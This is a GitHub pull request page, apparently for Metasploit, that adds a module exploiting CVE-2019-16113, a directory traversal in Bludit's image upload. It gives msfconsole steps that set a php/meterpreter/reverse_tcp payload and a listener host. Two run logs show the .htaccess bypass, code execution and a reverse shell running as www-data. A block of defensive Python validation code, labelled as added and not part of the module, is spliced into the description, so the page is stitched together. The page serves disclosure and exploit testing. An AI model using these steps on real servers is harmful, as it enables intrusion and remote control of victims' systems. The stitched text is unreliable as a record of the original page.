
Add CVE-2019-16113: Bludit Directory Traversal Image Upload Exploit #12542

Merged
merged 2 commits into from Nov 12, 2019

Conversation

@wchen-r7
Contributor

wchen-r7 commented Nov 5, 2019

Bludit Directory Traversal Image File Upload Vulnerability

Description

This module exploits a vulnerability in Bludit: A simple, fast, "secure", flat-file CMS. A vulnerability was found by christasa in the image uploading feature. A remote user could manipulate the uuid parameter in the upload feature in order to save a malicious payload anywhere onto the server, and then use a custom .htaccess file to bypass the file extension check, and finally get remote code execution.

Setup

  1. Set up an Ubuntu box with Apache, PHP, and MySQL.
  2. Download: https://www.bludit.com/releases/bludit-3-9-2.zip
  3. Follow the installation guide here. Make sure your Apache server sets AllowOverride All in /etc/apache2/apache2.conf.

Verification Steps

  • Start msfconsole
  • use exploit/linux/http/bludit_upload_images_exec
  • set rhosts [IP]
  • set bludituser [user]
  • set bluditpass [pass]
  • set payload php/meterpreter/reverse_tcp
  • set lhost [ip]
  • run; you should get a session like the following demo:

msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 172.16.135.1:4444 
[+] Logged in as: admin
[*] Retrieving UUID...
[*] Uploading qGkVsmahdK.png...
[*] Uploading .htaccess...
[*] Executing qGkVsmahdK.png...
[*] Sending stage (38288 bytes) to 172.16.135.162
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.162:47086) at 2019-11-05 08:54:34 -0600
[+] Deleted .htaccess
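The description above names two weaknesses: the uuid parameter is trusted when the destination directory is built, and a dotfile such as .htaccess passes the upload. The following is added example code for the defender side, not part of this module or of Bludit's source: the unsafe function is a constructed sketch of the bug class, and the hardened function applies the assumed policy (canonical UUID, image extension allowlist, no dotfiles, containment check); the upload directory path and extension list are assumptions.

```python
import os
import re

# Constructed illustration of the defect class, not Bludit's own source:
# the caller-controlled uuid is spliced into the destination path, so
# "../" segments in it move the write outside the upload directory.
def unsafe_upload_path(base_dir, uuid_param, filename):
    return os.path.normpath(os.path.join(base_dir, uuid_param, filename))

# Hardened form. Assumed policy: the uuid must be a canonical lowercase
# RFC 4122 string, the filename must be a bare image name (no dotfiles,
# so no .htaccess), and the final path must stay under base_dir.
UUID_RE = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$")
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}  # assumed allowlist

def safe_upload_path(base_dir, uuid_param, filename):
    """Return the destination path, or raise ValueError on any violation."""
    # 1. Strict format check on the uuid: this alone rules out traversal.
    if not UUID_RE.match(uuid_param):
        raise ValueError("uuid parameter is not a canonical UUID")
    # 2. The filename must be a single component and not a dotfile.
    name = os.path.basename(filename)
    if not name or name != filename or name.startswith("."):
        raise ValueError("filename contains a path component or is a dotfile")
    # 3. Extension allowlist, applied to the last extension only.
    if os.path.splitext(name)[1].lower() not in ALLOWED_EXT:
        raise ValueError("file extension not allowed for image upload")
    # 4. Defence in depth: canonicalise and confirm containment.
    root = os.path.realpath(base_dir)
    dest = os.path.realpath(os.path.join(root, uuid_param, name))
    if os.path.commonpath([root, dest]) != root:
        raise ValueError("destination escapes the upload directory")
    return dest

def upload_is_rejected(base_dir, uuid_param, filename):
    """True if the hardened path builder refuses this (uuid, filename) pair."""
    try:
        safe_upload_path(base_dir, uuid_param, filename)
    except ValueError:
        return True
    return False
```

Because the setup step above requires AllowOverride All for the exploit to work, setting AllowOverride None on the upload directory in the Apache configuration removes the .htaccess handler override as a second, independent layer.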
@wchen-r7
Contributor Author

wchen-r7 commented Nov 11, 2019

@space-r7 Yup I made some typos. I will correct them. Thanks.

@wchen-r7
Contributor Author

wchen-r7 commented Nov 12, 2019

This is good to go again.

@space-r7
Contributor

space-r7 commented Nov 12, 2019

This is good to go again.

I'll set up an environment, then test and land. Thanks!

@space-r7 space-r7 self-assigned this Nov 12, 2019
@space-r7
Contributor

space-r7 commented Nov 12, 2019

Tested on Bludit v3.9.2:

msf5 > use exploit/linux/http/bludit_upload_images_exec 
msf5 exploit(linux/http/bludit_upload_images_exec) > set bludituser admin
bludituser => admin
msf5 exploit(linux/http/bludit_upload_images_exec) > set bluditpass password
bluditpass => password
msf5 exploit(linux/http/bludit_upload_images_exec) > set rhosts 192.168.37.165
rhosts => 192.168.37.165
msf5 exploit(linux/http/bludit_upload_images_exec) > check
[*] 192.168.37.165:80 - The service is running, but could not be validated.
msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[+] Logged in as: admin
[*] Retrieving UUID...
[*] Uploading cqAWnwRSUh.png...
[*] Uploading .htaccess...
[*] Executing cqAWnwRSUh.png...
[*] Sending stage (38288 bytes) to 192.168.37.165
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.165:46068) at 2019-11-12 15:31:32 -0600
[+] Deleted .htaccess

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64
Meterpreter : php/linux
space-r7 added a commit that referenced this pull request Nov 12, 2019
@space-r7 space-r7 merged commit 717a31c into rapid7:master Nov 12, 2019
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed
msjenkins-r7 added a commit that referenced this pull request Nov 12, 2019
@space-r7
Contributor

space-r7 commented Nov 12, 2019

Release Notes

This adds an exploit module for Bludit, an open source CMS. For versions below v3.10.0, there is a vulnerability in the file upload functionality that allows an attacker to upload a file anywhere on the system by changing the uuid value in the upload request. An attacker can gain code execution by uploading a payload and uploading a new .htaccess file to bypass extension checks.
